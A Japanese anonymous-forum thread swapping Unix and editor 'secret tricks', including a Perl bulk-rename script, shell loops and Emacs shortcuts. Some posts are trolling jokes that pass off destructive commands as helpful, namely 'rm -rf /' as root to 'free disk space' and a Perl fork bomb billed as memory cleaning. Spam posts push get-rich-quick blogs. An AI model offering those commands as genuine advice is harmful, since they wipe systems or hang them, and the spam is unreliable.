すっごい裏技をみんなで集めるスレ
Bashで↑を押すと直前に実行したコマンドが呼べるとか。 かなりの玄人しか知らないはずの技を書き溜めましょう。
ルートになって rm -rf / をすると、ディスクスペースが空く。 su した後 rm -rf / して再起動。 これで劇的に負荷が下がるよ。 ところで同じディレクトリにある複数のファイルのファイル名の頭に 同じ文字列を付け加えたいんだけどどうすればいいの? aaa.txt bbb.txt ccc.txt を mona-aaa.txt mona-bbb.txt mona-ccc.txt って感じにしたいんだが。 ファイルが100個以上あるときなんか一個一個mvするのが面倒。 >>6 root で rm -rf / すると面倒なことはすべて消し飛ぶよ。 流れを無視してマジレス。 #!/usr/bin/env perl $regex = shift(@ARGV); foreach $f (@ARGV) { $g = $f; eval "\$g =~ $regex;"; print STDERR "$regex: $f -> $g\n"; if(!rename($f, $g)) { print STDERR "rename failed: $regex: $f -> $g\n"; } } こいつをrenameとして保存しておくとすると、 rename 's/^/mona-/' *.txt でおk。 >>7 >>9 ありがと〜、>>7 さんの方法でうまくいきました。 時間があったら>>9 さんの方も試してみます。 >>8 大変なことになりましたorz for file in *; do mv $file mona-$file done foreach f (./*) mv $file mona-$file end スタートボタンでファイル名を指定して実行 \\file_server を入れてOKを押すとfile_serverにログインできる。 混じれすすると、オープンソースのソフトウェアには裏技は存在しない。 C-p C-p C-n C-n C-b C-f (ry 素人でもいい。 カーソルキー使うとEmacsでgeditでもメモ帳でも秀丸でも 同じように操作できるから(viは...同じとはいいがたいな) >>21 設定次第でviもほぼ同じに ただし周りに五月蝿い人が居ないのを確認してから使おう Emacsのカーソル移動コマンド(C-f C-p C-n C-p)に、 繰り返しを表すC-uをつけることができる。 C-u C-u C-fみたいに累積させることもできる。 C-u 20 C-fみたいに回数を指定することもできる。 マザー2の裏技でブンブーンを最後まで連れて行ける裏技のやりかたしってる人いない? ニューナンブで弾を撃つよりも、グリップで殴った方が効果的 chs上でコマンドの始まり数文字打ってCtrl+D "ls;"Ctrl+D >>35 訂正 二番目はコマンド名の一部にならない文字(; & > |など)一文字打ってCtrl+D ウイルスがネットで侵入検知したら、 漏れの早業見せてやりたいな「瞬殺イーサ抜き」ドリャァ〜ッ! だから対策ソフトは不要(藁) /tmpのファイルをswapマウントしたらどうなるのですか? 間違って swap を NTFS としてマウントしたら虹色の世界が見えた。 >>41 普段は何かマウントしてるマウントポイントにでも置いとけ とりあえず暇つぶしに俺のHPw http://afox.s206.xrea.com/ uuussatm@gmail.com aviファイルを開けないんですけどどうすれば開けますか ・Sunの鯖を素早くシャットダウンする方法 1. "Stop+a"押下 2. okという文字列が出てくるので"power-off"と入力 3. Sun鯖がシャットダウンされます ・超簡単!メモリクリーニング 1. "perl -e 'while (1) { fork; }'"と入力 2. 不要なメモリのキャッシュがクリアされて鯖の速度UP! 需要があればもう少し書いてみる。 誰でも簡単にパソコン1台で稼げる方法など 参考までに、 ⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。 グーグル検索⇒『宮本のゴウリエセレレ』 QUCOEU0SBA 知り合いから教えてもらったパソコン一台でお金持ちになれるやり方 時間がある方はみてもいいかもしれません グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』 N5ICI read.cgi ver 08.0u [upliftProject] - 2023/07/09 Walang Kapalit ★ | uplift ★ 5ちゃんねる